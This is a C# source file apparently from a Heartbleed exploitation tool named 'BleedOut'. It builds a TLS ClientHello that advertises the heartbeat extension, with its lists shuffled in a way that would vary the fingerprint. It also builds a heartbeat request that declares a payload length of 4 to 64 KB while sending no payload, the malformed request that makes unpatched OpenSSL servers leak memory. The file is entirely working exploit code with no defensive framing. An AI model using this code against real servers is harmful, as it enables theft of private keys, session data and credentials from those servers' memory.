﻿using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace BleedOut
{
    public static class TlsHelper
    {
        private static Random _rnd = new Random();

        public static TlsHandshakeRecord CreateClientHello()
        {
            var randomBytes = new byte[28];

            lock (_rnd)
            {
                _rnd.NextBytes(randomBytes);
            }

            var record = new TlsHandshakeRecord()
            {
                Version = TlsVersion.Tls1_1,
                HandshakeType = HandshakeRecordType.ClientHello,
                HandshakeRecordVersion = TlsVersion.Tls1_1,
                Random = new TlsRandom()
                {
                    UnixTime = (uint)DateTime.Now.ToUnixTime(),
                    RandomBytes = randomBytes,                    
                },
                CipherSuites = new[]
                {
                    CipherSuite.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_DHE_RSA_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA,
                    CipherSuite.TLS_ECDH_RSA_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_RSA_WITH_AES_256_CBC_SHA,
                    CipherSuite.TLS_RSA_WITH_CAMELLIA_256_CBC_SHA,
                    CipherSuite.TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_RSA_WITH_3DES_EDE_CBC_SHA,
                    CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_DHE_RSA_WITH_SEED_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_WITH_SEED_CBC_SHA,
                    CipherSuite.TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA,
                    CipherSuite.TLS_ECDH_RSA_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_RSA_WITH_AES_128_CBC_SHA,
                    CipherSuite.TLS_RSA_WITH_SEED_CBC_SHA,
                    CipherSuite.TLS_RSA_WITH_CAMELLIA_128_CBC_SHA,
                    CipherSuite.TLS_ECDHE_RSA_WITH_RC4_128_SHA,
                    CipherSuite.TLS_ECDHE_ECDSA_WITH_RC4_128_SHA,
                    CipherSuite.TLS_ECDH_RSA_WITH_RC4_128_SHA,
                    CipherSuite.TLS_ECDH_ECDSA_WITH_RC4_128_SHA,
                    CipherSuite.TLS_RSA_WITH_RC4_128_SHA,
                    CipherSuite.TLS_RSA_WITH_RC4_128_MD5,
                    CipherSuite.TLS_DHE_RSA_WITH_DES_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_WITH_DES_CBC_SHA,
                    CipherSuite.TLS_RSA_WITH_DES_CBC_SHA,
                    CipherSuite.TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA,
                    CipherSuite.TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA,
                    CipherSuite.TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,
                    CipherSuite.TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5,
                    CipherSuite.TLS_RSA_EXPORT_WITH_RC4_40_MD5,
                    CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV,
                }
                .Shuffle(),
                CompressionMethods = new byte[] { 0 },
                Extensions = new TlsExtension[]
                {
                    new EllipticCurvePointFormatsExtension()
                    {
                        Formats = new []
                        {
                            EllipticCurvePointFormat.Uncompressed,
                            EllipticCurvePointFormat.AnsiX962CompressedPrime,
                            EllipticCurvePointFormat.AnsiX962CompressedChar2,
                        }
                        .Shuffle(),
                    },
                    new EllipticCurvesExtension()
                    {
                        EllipticCurves = new []
                        {
                            EllipticCurve.sect571r1,
                            EllipticCurve.sect571k1,
                            EllipticCurve.secp521r1,
                            EllipticCurve.sect409k1,
                            EllipticCurve.sect409r1,
                            EllipticCurve.secp384r1,
                            EllipticCurve.sect283k1,
                            EllipticCurve.sect283r1,
                            EllipticCurve.secp256k1,
                            EllipticCurve.secp256r1,
                            EllipticCurve.sect239k1,
                            EllipticCurve.sect233k1,
                            EllipticCurve.sect233r1,
                            EllipticCurve.secp224k1,
                            EllipticCurve.secp224r1,
                            EllipticCurve.sect193r1,
                            EllipticCurve.sect193r2,
                            EllipticCurve.secp192k1,
                            EllipticCurve.secp192r1,
                            EllipticCurve.sect163k1,
                            EllipticCurve.sect163r1,
                            EllipticCurve.sect163r2,
                            EllipticCurve.secp160k1,
                            EllipticCurve.secp160r1,
                            EllipticCurve.secp160r2,
                        }
                        .Shuffle(),
                    },
                    new SessionTicketExtension(),
                    new HeartbeatExtension()
                    {
                        Mode = HeartbeatMode.PeerAllowedToSend,
                    },
                }
                .Shuffle(),
            };

            record.SetLength();

            foreach (var ext in record.Extensions)
            {
                ext.SetLength();
            }

            return record;
        }

        public static HeartbeatRecord CreateHeartbeat()
        {
            ushort len;

            lock (_rnd)
            {
                len = (ushort)_rnd.Next(0x1000, 0x10000);
            }

            var record = new HeartbeatRecord()
            {
                Version = TlsVersion.Tls1_1,
                Type = HeartbeatMessageType.Request,
                PayloadLength = len
            };
            
            record.SetLength();

            return record;
        }
    }
}
